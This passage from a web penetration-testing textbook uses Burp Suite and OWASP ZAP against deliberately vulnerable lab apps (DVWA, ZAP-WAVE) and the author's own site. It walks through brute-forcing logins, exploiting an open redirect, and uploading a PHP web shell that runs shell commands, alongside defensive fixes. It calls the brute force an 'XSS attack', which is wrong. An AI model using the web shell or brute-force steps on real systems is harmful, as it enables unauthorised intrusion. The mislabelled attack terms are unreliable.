<pre>HTTP/1.1 200 OK Date: Sun. 23 Jun 2010 09:23:06 GMT Server: Aache/2.2.14 (Ubuntu) mod mono/2.4.3 PMP/5.3.2-lubuntu4.30 with pythm/3.3.1 Pythen/2.6.5 mod_s01/2.2.14 Open/51/0.3.8k Phusion_Passenge Vary: Accepter Decorp Vary: Accepter Decorp Content-Type: text/html; charset=ISO-8859-1</pre>	Suhosin-Patch proxy html/3.0.1 mod r/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
<pre>uncreased=rtrimesorie = because the computer = burgetitiesecrip; comp function \$10\$ (document, susergues, focus);)//3 «/script=script inspage=?avaGcript=function (becktag()(var RE = /[a usergues_submb)(& abert"only letters are valid in this field?); [true:]].script=beckgetitesecript=function.checktag()(var RE = /[a true:]].script=beckgetitesecript=function.checktag()(var RE = /[a true:]].script=beckgetitesecript=function.checktag() var [true:]].script=beckgetitesecript=function.checktag() var [true:]].script=beckgetitesecript=beckgetitesecript=function.checktag() var [true:]].script=beckgetitesecript=beckgetite</pre>	Dages Jarascipt >= 10 -2A-2/; if (RE.test(document.F. turn false;) else (ELLPODIG-1 indesfi) = table (ELLPODIG-1 - «/trp-«/table=whr size="3" color= nter a 5 letter word as a guess. Wit
👌 Active Scan 🛉	
	ŕ
Solution: but it in of valid if you are expecting colors such as "red" or "blue." Ensure that you perform input validation at well-defined interfaces within the applicat application even if a component is reused or moved elsewhere. Reference: http://projects.webappsec.org/Cross-SRe-Scripting http://cwe.mire.org/data/definitions/79.html	tion. This will help protect the
	Sun 05:32 Untitled Session - 20190623-050733 - OWASP ZAP 2.8.0 Untitled Session - 20190623-050733 - OWASP ZAP 2.8.0 Untitled Session - 20190623-050733 - OWASP ZAP 2.8.0 Untitled Session - 2019 - 2019 Untitle - 2019

Figure 4-10. Seven high alerts sounded in OWASP ZAP tool

I highly recommend using Burp Suite and OWASP ZAP side by side. Sometimes it is not necessary, because Burp Community edition alone can handle the task. However, in some cases we can double-check with the ZAP scanner.

We can get the ZAP scanning report at the same time by pressing the Active Scan on the top (Figure 4-11).

Applications - Places -	🕑 Firefox ESR 👻	Sun 05:41 🚺 😼	/ 10		
2		ZAP Scanning Report - Mozilla Firefox	0	•	0
S Welcome to Vicnum ×	ZAP Scanning Report X	+			
⊖ → ⊂ ☆	Q about:blank		111 0	D	≡
🌣 Most Visited 🔞 Getting Star	ted 🥆 Kali Linux 🥆 Kali Training	🕆 Kali Tools 🥆 Kali Docs 🌂 Kali Forums 🌂 NetHunter 🚺 Offensive Security 🔶 Exploit-DB	. GH	DB	>>
Summary of Alerts	0	ZAP Scanning Report			
Risk Level	Number of Alerts				1
High	0				
Medium	1				
Low	2				. 8
Informational	0				
Alert Detail Medium (Medium)	X-Frame-Options Header Not Se				l
Description	X-Frame-Options header is not inc	luded in the HTTP response to protect against 'ClickJacking' attacks.			
URL	http://192.168.2.3/vicnum/				
Method	GET				
Parameter	X-Frame-Options				
Instances	1				
Solution	Most modern Web browsers suppo only by pages on your server (e.g. should use DENY. ALLOW-FROM	rt the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be fram allows specific websites to frame the web page in supported web torwsers).	to be fra ed, you	urned	
Reference	http://blogs.msdn.com/b/ieinternal	s/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx			
CWE Id	16				

Figure 4-11. ZAP scanning report

This scanning report gives us a detailed view of how we can avoid vulnerabilities; as a penetration tester, you can advise your client to take necessary actions based on that.

The number of alerts may differ from time to time, depending on a few things. The JavaScript code you have used for your attacks may vary; the vulnerabilities of the application may also vary. Last, which type of alert you have selected to get the scan report also matters.

I have included a part of this scanning report here:

```
//code 4.4
```

Description

```
X-Frame-Options header is not included in the HTTP response to
protect against 'ClickJacking' attacks.
URL http://192.168.2.3/vicnum/
Method GET
Parameter X-Frame-Options
Instances 1
Solution
```

Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g., it's part of a FRAMESET), you'll want to use SAMEORIGIN; otherwise, if you never expect the page to be framed, you should use DENY. ALLOW-FROM allows specific web sites to frame the web page in supported web browsers.

Reference

```
http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/
combating-clickjacking-with-x-frame-options.aspx
```

The advantage of using ZAP is that you can have an idea of how to write your report. As you see (code 4.4), the solution has also been given.

In OWASP broken web applications there are plenty of different intentionally vulnerable applications. But you can't just use any of them for any type of attack. The last application (Vicnum) is not suitable to exploit using the brute force method for stealing username-password. Therefore, we need to try another application, which will give us an overview of how we could do that type of XSS attack.

Exploiting XSS Vulnerabilities

In this section, we will see how we can exploit through XSS. We want to adopt the brute force method to steal the user-name and password of any application.

Let us try the Damn Vulnerable Web Application or DVWA (Figure 4-12). You can install it individually and open it; or you can open it from just installed OWASP BWA collections.



Figure 4-12. The DVWA application wants user-name and password.

We have already opened our Burp Suite and kept the intercept in "off" mode, so that the DVWA application could have opened and the traffic could pass through Burp.

In the next step, we will change the Burp intercept mode to "on" and will try a user-name and password combination on the DVWA.

Let us try a simple user-name and password combination, such as "user" and "password." You can try any combination. Whatever combination you use, it should reflect on the Burp like this (Figure 4-13).



Figure 4-13. The user-name and password combination reflected on Burp

You can see the output here:

```
//code 4.5
POST /dvwa/login.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/dvwa/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
```

```
Cookie: security=low; PHPSESSID=cv8hr0pa3evsb6v26hv0
5pt103; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
username=user&password=password&Login=Login
```

At the last line, you can see that the user-name and password combination has been reflected.

Next, we are going to select the last line: username=user&password=pa ssword&Login=Login and click the second mouse button. Several options are opened up; we will select the option to send it to the Intruder. Once it has been sent to the Intruder, click the Positions tab at the top of the page; you will find that a few lines have automatically been selected. On the right side, you will find some buttons: Add, Clear, etc. (Figure 4-14)



Figure 4-14. The Payload positions

We will click the Clear button and clear those selected lines. Next, we will select user-name, password, and the login in the last line and click the Add button. Basically, the Clear button removes all types of special characters from the whole response. When we use the Add button, we add the payloads where we need them. For each *attack* request, Burp Suite takes the request template and places one or more payloads into the positions. We have chosen the Sniper attack because this uses a single set of payloads.

Now our payloads are ready, so we can mouse click the Payloads tab at the top of this window. Now we can add some user-name here, such as "admin," "john," "smith," etc. (Figure 4-15).



Figure 4-15. Adding some user-names in the Payloads section

For the passwords, we will load a default word list from usr/share/ wordlist, from the metaspoilt folder, which includes many files with ".txt" extensions like this (Figure 4-16).



Figure 4-16. Loading the combination of passwords from word lists

Once it has been done, click the "Start attack" button on the top righthand corner (Figure 4-17). The XSS attack will take place once you click the button. The username-password payloads will start checking all the combinations used in the DVWA application.



Figure 4-17. Brute forcing the XSS attack through Burp Suite

It will find the combination of user-name and password individually; therefore, it may take time according to the number of user-names and passwords that have been fed to the Burp Suite.

In a normal case, on the right side, you can watch the Length of the status. The top one is considered to be the base, where we can expect the XSS attack to successfully exploit the vulnerability of the application and find the right combination.

Here it is 1777; this number is calculated by Burp Suite based on probability. Hence, the higher the number, the greater the chance of success.

We have finally got a combination that matches 5218, which is much greater than 1777. The combination is admin and admin.

Let us try this combination on DVWA.

It works absolutely fine; we can safely enter the application by typing user-name admin and password admin (Figure 4-18).



Figure 4-18. We have successfully exploited the user-name and password combination by brute forcing the XSS attack, and logged into DVWA.

Once we have logged in, the Burp Suite catches the traffic again:

//code 4.6

```
POST /dvwa/login.php HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/dvwa/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
```

```
Cookie: security=low; PHPSESSID=cv8hr0pa3evsb6v26hv0
5pt103; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```
username=admin&password=admin&Login=Â&LoginÂ&
```

Watch the last line: our user-name and the password combination have been reflected in the output.

Through advanced XSS attacks, hackers can also implant malicious code in web sites. As I mentioned earlier, broadly there are two types of XSS attacks; in one of them, data is included in the dynamic content. Because of that, every now and then, we hear about a new type of attack. Megacart attack is one of the latest attacks where many banks in the United States and Canada were affected. In such attacks, using client-side browsers, data were skimmed.

Therefore, keep yourself always updated; read articles pertinent to the discussion. Furthermore, finding security bugs in any web application is not limited to one single concept like XSS. There are other types of attacks, and they are related. In the coming chapters we will learn them. As you learn different techniques, my recommendation is always try to find what connects the dots. How is one type of vulnerability related to another type of vulnerability?

CHAPTER 5

Header Injection and URL Redirection

Header injection and URL redirection are possible when a web application accepts unvalidated user inputs. This untrusted data may redirect the page to a malicious web site.

Introducing Header Injection and URL Redirection

Consider some simple PHP code:

```
//code 5.1
<?php
/* Redirecting browser */
header("Location: https://www.sanjib.site");
?>
```

The preceding PHP file, once clicked, takes us to the https://sanjib.site. Now, consider a case when a developer writes the same code this way:

//code 5.2

```
<?php
/* Taking untrusted input from a form and Redirecting browser */
$RedirectingURL = $_GET['url'];
header("Location: " . $RedirectingURL);
?>
```

In the preceding code, the user input is displayed on the header. One can easily manipulate this query string and redirect the location to some malicious sites, which an attacker can control.

Modifying the untrusted URL input to a malicious site, an attacker may successfully launch an attack stealing user credentials. Therefore, as a penetration tester, you need to test whether your client's application has URL redirection vulnerabilities or not: whether that application leads user input into the target of a redirection in an unsafe way or not.

If the application has such vulnerabilities, the attacker can construct a URL within the application that causes a redirection to a malicious site and users, even if verified, cannot notice the subsequent redirection to another site.

We can try to understand the whole situation better by using a diagram (Figure 5-1).



Figure 5-1. How a user is redirected to a malicious site

When the URL is being explicitly declared in the code, it is safe (code 5.1). We can also consider Java code written in a safe way:

//code 5.3

```
response.sendRedirect("https://www.sanjib.site");
```

If you change this code to this way, it becomes vulnerable, because it receives the URL from the parameter named url (GET or POST) and redirects to that URL:

//code 5.4

```
/* here string url accepts user input */
response.sendRedirect(request.getParameter("url"));
```

This vulnerability could be turned into a phishing attack by redirecting users to a malicious site by injecting the header. How it can be done we will see in the next section. At this point we should also remember the importance of OAth 2.0 access token leak. Why is it important? First, web applications usually want to use the service of another application; instead of using your password, they should use a protocol called OAuth. However, you should be careful about how another application stores or uses your data. Suppose for logging into another application you use your Facebook credentials. Open access authorization sometimes invites danger when token injection takes place.

Cross-Site Scripting Through Header Injection

So far we have learned that open redirections or URL redirections are potential vulnerabilities for any web application. Under the influence of untrusted user input data, any web application may fall into this phishing trap. In such cases, a redirection is performed to a location specified in user-supplied data.

We will demonstrate how we can use Burp Suite's Proxy, Spider, and Repeater tools to check for open redirections in a moment. We are going to test an intentionally vulnerable web application ZAP-WAVE; it is designed for evaluating security tools.

This application is available in the OWASP broken web application project. We have already installed it in our virtual lab. First, run the "owaspbwa" application. In that application, you will get a link to ZAP-WAVE. Click and open it (Figure 5-2).

Applications 🕶	Places - 🕑 Firefox ESR -	Wed 06:02		1,7	1 1) (D	-
		OWASP ZAP WAVE - Index - Mozilla Firefox			0	۲	0
S OWASP ZAP	WAVE - Ind × +						
(←) → C' @	(i) 192.168.2.3/zapwave/	🖸 🏠	II\ 🗉 🤨 🛞 🕑 😫	@ @ III	•	Ø	≡
A Most Visited	🔨 Kali Training 🌂 Kali Tools 📓 MSFu	🌣 Most Visited 💊 Getting Started 🛅 Fedora Project	🛅 Red Hat 🛅 Free Content 🛅 Fro	om Google Chr	rome		>>
OWASP 2	ZAP Web Application	Vulnerability Examples					
The OWASP Z	ed Attack Proxy - Web Application	Vulnerability Examples (WAVE) are a set of pag	ges which exhibit known vulner	rabilities.			
The vulnerabi They have bee	lities included are only those that c in developed to test OWASP ZAP be	an (or should be) detectable via automated sca at can be used for any other legitimate purpose	nners.				
Each page sho Only essential	ould contain only one vulnerability, links should be included so that au	and should be as simple as possible an example tomated spidering can be constrained as easily	e. 7 as possible.				
See source co	de for licence details.						
Categories							
Active vu Passive v False pos	Inerabilities, which can (probably; ulnerabilities, which can be tested <u>itives</u> , which are not vulnerabilites	only be tested by active scanners by passive scanners but look like them					

Figure 5-2. ZAP-WAVE application in the OWASP broken web application project

We have already configured our Burp Suite. Let us ensure that the Burp Proxy intercept is on. Now we visit the ZAP-WAVE page and the traffic is reflected on our Burp Proxy (Figure 5-3).



Figure 5-3. We have intercepted the ZAP-WAVE traffic on the Burp Suite.

We get this output on our Burp screen:

```
//code 5.5
```

```
GET /zapwave/ HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.3/
Cookie: JSESSIONID=908984390DB986CA443B6D455864E077; PHPSESSID=
6iccf8niu6j4a5sq27c9k5a4a2; acopendivids=swingset,jotto,phpbb2,
redmine; acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

Let me clarify how the request header is working here. On the top, there is HOST. Here, it is 192.168.2.3. It is the desired host that handles the request. Next comes the part of acceptance. The Accept part specifies that all MIME types are accepted by the client; for web services, the JSON or XML outputs are specified. The next step handles the cookie. It is a very important part of any request. The browser passes the cookie data to the server.

In Figure 5-3 we can see the Proxy > Intercept tab shows the intercepted request. Now we will right-click our mouse and send this request to the Spider tool. You don't have to select any item or line, you can click anywhere on the context and choose the Spider tool (Figure 5-4).

In the pop-up menu bar it will ask to add this term to the scope of your Spider tool and once you do it, it will add the request to the scope.



Figure 5-4. Sending the intercepted data to the Spider tool

The Spider tool spiders the web application. The Burp Target tool including the Spider tool contains detailed information about your target applications and lets you drive the process of testing for vulnerabilities. Here we are doing the same thing. Burp Proxy is an intercepting web proxy that operates as a man-in-the-middle between the end browser and the target web application.

It will also populate the Site Map tool (Figure 5-5).



Figure 5-5. The Spider status on Burp Suite

If you go to the Target tab and click "Site map," you will see all the spidered view of the ZAP-WAVE application now.

However, we will use our site map filter here for one particular purpose. We will search for any redirection codes or forwards used by the Site Map. When you click the Filter bar to bring up the options menu, you will find on your right-hand side "Filter by status code" options, under which you will select only 3xx status codes. These status codes indicate that a redirection is needed to fulfill a request (Figure 5-6).

Inte	uder Repeater	Window He	Þ												
pet	Pravy Spide	r Scanner	Intruder	Repeater	Sequencer	Decoder	Comparer	Extender	Project options	User options	Alerts	×ssValdator			
e ma	Scope														
Hid	ng not found iter	ns; hiding C1	IS, image an	d general bin	ry content; I	hiding 2xx, 4x	x and 5xx re	oponses; hide	ng empty folders						
							-		e.11		100	Title	Comment	Time regu	
1	ter by request	сурня		Pitter by M	ME type		Pitter by st	acus code	Poiders					06:06:56 2	
	Show only i	n-scope Rem	5 I	HTMI	. 🗹 🛛	ther text	2 2 4 4	(success)	🕑 Hide	empty folders				00.00.33 2	
	Show only r	equested iter	ns	Soriel	:	nages	Bxx .	[redrection]							
	Show only p	var anneterize	irequests	XML	I +1	lash	- 4ox	(request error	a						
	Hide not-for	and items		E CSS	00	ther binary	U Sxx	[server error]							
	itter by search to	erm (Pro only	1	Filter	by file extens	ion		10	er by annotation						
ſ	-						shp								
					show only:	asp, asp x jsp, p									
	E Regel					in all income									
	Case sensit	ve III i	legative sear	a .		14 9 9 9 9 9 1 9 1 9 1 9 1 9 1 9 1 9 1 9									
1	Show al	Hide al	Revert cha	nges											
e	ALCOHOLD FOR THE			IT Accept 4											
ety ety	sillanar aramma	rly com		User-Age	nt: Mozilla	x/5.0 (compa	stible; MSI	E 9.0; Wind	ovs NT 6.1; W	in64; x64; Tr	ident/5.	0)			
tty	s://go.cpanel.net			Connectà Referer:	http://192	2.168.2.3/21	www.acti	ve/redirect	/redirect-for	-basic iso					
ety Hu	s://groups.google ://muery.com	L COM	ſ	Content-	Type: appli	ication/x-w	re-form-url	encoded							
115	s://Sghtning.dc.ca	beroot.co		Coskie:	SESSIONIO	elloeocere4	43F73791670	F872FA700F7	zap-info-co	kie-no-http-	nly=tes	t; zap-xss-cook	ie-basic=Peter Wi	riter	
tt;	st/mc.yandex.ru		2 I.		diama lan										
et.s	s://profile.accourt	ts.frefox.cor	n	targeter	edirect-roc	sex.1sp									
et;	//promo peertub	e.net													
ets 	s//push.services	mozilla com													
	s://safebrowsing	poogleapis.co	m												
-	//sampb.site 2002	2													
eta eta	e://ehavar.servic/	es mozila cor	2.0												
eta eta	stature to the statu														
	Wsimpleyoutube	converter.co	n 												
市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市市	(/simpleyoutube s://simpleyoutub //sites.google.co	converter.co econverter.co m	m												

Figure 5-6. Selecting 3xx class in Filter by status code

In the site map table, you will now find only the HTTP requests of the 3xx class (Figure 5-7).



Figure 5-7. HTTP requests of 3xx class

As you see, there are two HTTP requests that belong to the 3xx class. We can now manually step through these requests to find a URL where we have a request parameter.

The output of the first URL looks like this:

//code 5.6

```
POST /zapwave/active/redirect/redirect-form-basic.jsp HTTP/1.1
Host: 192.168.2.3
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.2.3/zapwave/active/redirect/redirect-
form-basic.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: JSESSIONID=B110B0C8FB43F7379167CF872FA700F7; zap-info-
cookie-no-http-only=test; zap-xss-cookie-basic=Peter Winter
target=redirect-index.jsp
```

Discovering Header Injection and URL Redirection Vulnerabilities

So far we have got two HTTP requests; between them, the first one (code 5.6) does not show any request parameter. Let us check the second (Figure 5-8).



Figure 5-8. Finding a request parameter

Let us show the output so that you can see for yourself whether it shows any request parameter or not.

//code 5.7

```
GET /zapwave/active/redirect/redirect-url-basic.
jsp?redir=redirect-index.jsp HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=B110B0C8FB43F7379167CF872FA700F7
DNT: 1
```

```
Connection: close
Upgrade-Insecure-Requests: 1
The first line of code 5.7 goes like this:
GET /zapwave/active/redirect/redirect-url-basic.
jsp?redir=redirect-index.jsp HTTP/1.1
```

Through that redir request parameter, we can test our URL redirection technique using Burp Suite's Repeater tool. We are going to inject the header and show that this application has URL redirection vulnerabilities.

In other words, we can change the parameter and try to investigate whether URL redirection is possible or not. To investigate any further, we should send it to the Repeater tool. Just right-click on the request in the Site map table and click "Send to Repeater" (Figure 5-9).



Figure 5-9. Sent the HTTP request parameter to the Repeater tab

Let us first click the "Go" button to test whether the URL redirection works or not. We find that the response is OK (Figure 5-10).



Figure 5-10. Testing the HTTP request in the Repeater tab

Watch the output on the right hand side:

```
//code 5.8
HTTP/1.1 302 Moved Temporarily
Date: Wed, 26 Jun 2019 10:15:38 GMT
Server: Apache-Coyote/1.1
Location: http://192.168.2.3/zapwave/active/redirect/redirect-
index.jsp
Content-Type: text/html
SET-COOKIE: JSESSIONID=B110B0C8FB43F7379167CF872FA700F7;
HttpOnly
Via: 1.1 127.0.1.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
```

Now, on our left side, we will try to change the value of the URL parameter to an external URL parameter such as https://sanjib.site. You can choose any different domain.

We will change the URL parameter to this:

```
http://192.168.2.3/zapwave/active/redirect/redirect-url-basic.
jsp?redir=https://sanjib.site
```

First we will click "Go" to test if the URL is altered or not. It is altered, as our response output changes to this:

//code 5.9

HTTP/1.1 302 Moved Temporarily Date: Wed, 26 Jun 2019 10:15:38 GMT Server: Apache-Coyote/1.1 Location: https://sanjib.site Content-Type: text/html SET-COOKIE: JSESSIONID=B110B0C8FB43F7379167CF872FA700F7; HttpOnly Via: 1.1 127.0.1.1 Vary: Accept-Encoding Content-Length: 0 Connection: close

In Figure 5-11 we can see the raw response.



Figure 5-11. The response shows that URL redirection occurs.

Now, we can open an incognito tab in our browser and paste the redirect URL (http://192.168.2.3/zapwave/active/redirect/ redirect-url-basic.jsp?redir=https://sanjib.site) to test whether it opens up or not.



Figure 5-12. The URL redirection occurs successfully to https://sanjib.site

Since the URL redirection occurs successfully, as a proof of concept (PoC) we can write this in our report: "The redirector of this web application is open and it has vulnerabilities."

Finally, the Site map tab of the Burp Suite also shows that we have successfully done the header injection and the URL redirection occurs (Figure 5-13).



Figure 5-13. As a PoC, we can submit this figure also.

And in the raw request we see this output:

```
//code 5.10
```

```
GET /zapwave/active/redirect/redirect-url-basic.
jsp?redir=https://sanjib.site HTTP/1.1
Host: 192.168.2.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=B110B0C8FB43F7379167CF872FA700F7
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

Now, as a penetration tester your job will include writing the final report containing the PoC, where you can mention some points that might act as a remedy to the URL redirection vulnerabilities.

- If possible, the application should avoid accepting the URL as user input. If it incorporates user-controllable data into redirection, it becomes automatically vulnerable.
- Therefore, removing the redirection function is the first step. The second step is using a direct link instead of user inputs.
- Maintaining a server-side list of all URLs is a good idea. Only these URLs are permitted for redirection.
- If it is unavoidable for the redirection function to receive user inputs; they must be strongly validated. It means the redirection function should verify that the user-supplied URL begins with "http://yoursite.com/" before issuing the redirect.

CHAPTER 6

Malicious Files

Uploaded malicious files always pose a great threat to web applications. An attacker tries to upload code to the system to be attacked; later that code is supposed to be executed. Usually, the "attack" only needs to find a way to get the code executed to own the system.

The consequences vary: it could be shell commands to be executed later; it could be just an image to declare that the web site has been hacked; or it could be more severe, including system takeover, forwarding attacks to back-end systems, and many more that also include side channel attacks. When a computer system is implemented, the process of implementation may expose sensitive information, and side channel attacks are mainly based on that, rather than on system weaknesses. We can mention Meltdown and Spectre, the hardware vulnerabilities that can affect modern operating systems or processors. We will discuss other types of attacks shortly.

Overall, the file-upload-module is one of the favorite playgrounds for hackers. As an accomplished penetration tester, you need to know how to conduct such attacks, so that you can convince your clients to take steps to secure the upload mechanism. You can also test whether the application has vulnerabilities or not.

In this chapter we will discuss such steps.

Uploading Malicious Files to Own a System

To start with, the file-upload-module needs a "file upload form." This form could easily be a major security risk because, if it is done without a full understanding of the risks associated with it, it might open the doors for server compromise. However, despite the security concerns, you cannot imagine a web application without a file-upload-module. It is one of the most common requirements.

As a penetration tester, you will find that several applications still contain an insecure, unrestricted file-upload-module. In this section we will discuss those common flaws. Before that, we will see how we can upload malicious PHP code to an intentionally vulnerable web application, and we will also try to do the same on a live application.

Let us first open our Burp Suite, keeping its "intercept" in "off" mode. Open the OWASP broken web application in your virtual lab and click the Damn Vulnerable Web Application or DVWA. Log in the application with the user name "admin" and password "admin" (Figure 6-1).



Figure 6-1. DVWA web application

We will try to upload malicious PHP code to this application. On the left panel you will find a link—"upload." Usually, it accepts only images with extensions such as jpg, jpeg, gif, and png. If you want to upload any text file, it rejects it. If you want to upload any PHP file, it rejects it. Our challenge is to upload a malicious PHP shell command that will give us a directory listing, as well as also creating a directory called "hacker."

Let us go to the page source of DVWA to find if the form has vulnerabilities.

//code 6.1

```
<div class="vulnerable_code_area">
```

```
<form enctype="multipart/form-data" action="#" method="POST" />
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose an image to upload:
<br />
<input name="uploaded" type="file" /><br />
<br />
<input type="submit" name="Upload" value="Upload" />
</form>
</div>
```

It is a simple HTML form without having any server-side validation. You have noticed that the weakness is the action area where a PHP file should have validated and sanitized the file.

At the same time, in a live and secured web application https:// sanjib.site, which I own, I have a similar file-upload-module where I have done the server validation and restricted file upload to only images. The file-upload-module interface looks like this (Figure 6-2).


Figure 6-2. File-upload-module interface in https://sanjib.site/upload

Let us first try to upload an image using https://sanjib.site/upload live interface (Figure 6-3).



Figure 6-3. Uploading an image to https://sanjib.site/upload

It works. In the next figure, we can see that the image has been uploaded successfully (Figure 6-4).



Figure 6-4. The file has been successfully uploaded.

Here we need to understand one simple thing. A simple file-uploadmodule usually consists of an HTML form. It is presented to the user who is using this interface to upload an image or any file. We need to have a server-side script to process that request.

In https://sanjib.site/upload, we also have a server-side script like this:

```
//code 6.2
```

You could have started a PHP session here, and maintain that session in the "upload.php" where the real action takes place.

```
//code 6.3
```

```
//upload.php
if (isset($_FILES['uploadedFile']) && $_FILES['uploadedFile']
['error'] === UPLOAD_ERR_OK)
{
    $fileTmpPath = $_FILES['uploadedFile']['tmp_name'];
    $fileName = $_FILES['uploadedFile']['name'];
    $fileSize = $_FILES['uploadedFile']['size'];
    $fileType = $_FILES['uploadedFile']['type'];
    $fileNameCmps = explode(".", $fileName);
    $fileExtension = strtolower(end($fileNameCmps));
```

```
// sanitizing file-name
$newFileName = md5(time() . $fileName) . '.' .
$fileExtension:
// checking if file has one of the following extensions
$allowedfileExtensions = array('jpg', 'jpeg', 'gif', 'png');
if (in array($fileExtension, $allowedfileExtensions))
{
 // directory in which the uploaded file will be moved
  $uploadFileDir = './uploaded files/';
 $dest path = $uploadFileDir . $newFileName;
  if(move uploaded file($fileTmpPath, $dest path))
  {
   echo 'File is successfully uploaded.';
  }
 else
  {
    echo 'There was some error moving the file to upload
    directory. Please make sure the upload directory is
   writable by web server.';
  }
}
else
{
echo 'Upload failed. Allowed file types: ' . implode(',',
$allowedfileExtensions);
}
```

Now you can compare both code listings: the intentionally vulnerable application DVWA has an HTML form only, and it does not have any dynamic processing mechanism that could have checked uploading other files. On the other hand, in the https://sanjib.site/upload page we have that mechanism. Initially, it is enough to restrict other files, although it is not fully tested. We will see that in the next section, where we will discuss defacement.

Primarily, we will try to upload malicious PHP code, which is full of shell commands (code 6.3), to the DVWA upload page.

```
//code 6.4
```

```
<?php
$output1 = shell_exec('ls -la');
$output2 = shell_exec('mkdir hacker');
$output3 = shell_exec('cal');
$output4 = shell_exec('pwd');
echo "<pre>$output1";
echo "$output2";
echo 'directory hacker created successfully';
echo"<hr>";
echo "$output3";
echo"<hr>";
echo "$output4";
echo "$output4
```

Let's do that now. Turn the "intercept" to "on" in Burp Suite so that we can watch the request and response (Figure 6-5).



Figure 6-5. Burp Suite Proxy traffic of DVWA

At the same time, we have tried to upload the same malicious PHP code to the https://sanjib.site/upload page. Let us first see what response we have received from the https://sanjib.site/upload page (Figure 6-6).



Figure 6-6. The https://sanjib.site/upload page has rejected the malicious PHP code.

The https://sanjib.site/upload page has rejected the malicious code. In its output, it clearly says what type of files it would accept.

However, the DVWA application has given us a completely different output (Figure 6-7).



Figure 6-7. The malicious PHP shell command code has been successfully uploaded in the DVWA.

Visit the URL mentioned as a result of the upload in Figure 6-7 (192.168.2./dvwa/hackable/uploads/shell-command.php). We are able to create a directory called hacker in that application (Figure 6-8).



Figure 6-8. You can see, in the DVWA "hackable/uploads" directory, we have successfully created a directory called "hacker."

We can move into that directory through our URL now (Figure 6-9).



Figure 6-9. The URL of the DVWA application shows the inside of the newly created "hacker" directory.

In this section, we have learned how we can upload malicious code to any web application that has vulnerabilities in its file-upload-module. We have also learned that primarily a strong back-end mechanism can thwart that attack. However, is it enough?

We will see in the next section, where we are going to hack a live system that I own: https://sanjib.site/upload. Since I am the owner of this site, I can test it. But, remember, you may not do the same test on any live system without first getting permission from the owner.

Owning a Web Site

We have seen examples of real-life defacement earlier; many web sites were taken down and the home page was defaced by some messages. Hackers of any enemy country take over any government web site and post some foul comments declaring that the site has been hacked. This is a typical example of defacement; we have seen it in the case of the Anonymous group. Basically, defacement represents owning a system.

However, the root of defacement goes deeper. It is not always just blurring a web site home page with another image. The concept of owning a system goes much deeper than what we see in front of us. Defacement is a part, just a physical expression of owning a system; however, it undermines reputation. Furthermore, owning a system may infect a database, stealing user passwords or attacking other related applications and so on. We are going to deface https://sanjib.site/upload in a minute; then you will find how dangerous that can be.

The uploaded file metadata is very important. The metadata consists of all the information related to that file. It includes the extension, the type of file, the owner of the file, whether the file is writable or not, etc. We are going to trick the server of the https://sanjib.site/upload application into accepting the malicious PHP shell code. Again, we are going to upload a PHP file that will execute shell commands so that we can own the system. I want to repeat it again: defacement is a small part of owning a system. Owning a system means many things that I have just explained.

We have not written a special .htaccess file that allows only jpg, jpeg, gif, and png files. For these specific requirements, we should do so.

```
//code 6.5
//.htaccess
  deny from all <
   files ~ "^w+.(gif|jpe?g|png)$">
   order deny,allow
   allow from all
   </files>
```

In our case, let us see what is going to happen. We will upload the malicious PHP code using Burp Suite. Now, keeping our Burp Suite intercept in the "on" mode, let's try to upload this malicious PHP code; the filename is shell-command.php:

//code 6.6

```
<?php
$output1 = shell_exec('ls -la');
$output2 = shell_exec('mkdir hacker');
echo "<pre>$output1";
echo"<hr>";
echo "$output2";
echo 'directory hacker created successfully';
echo"<hr>";
?>
```

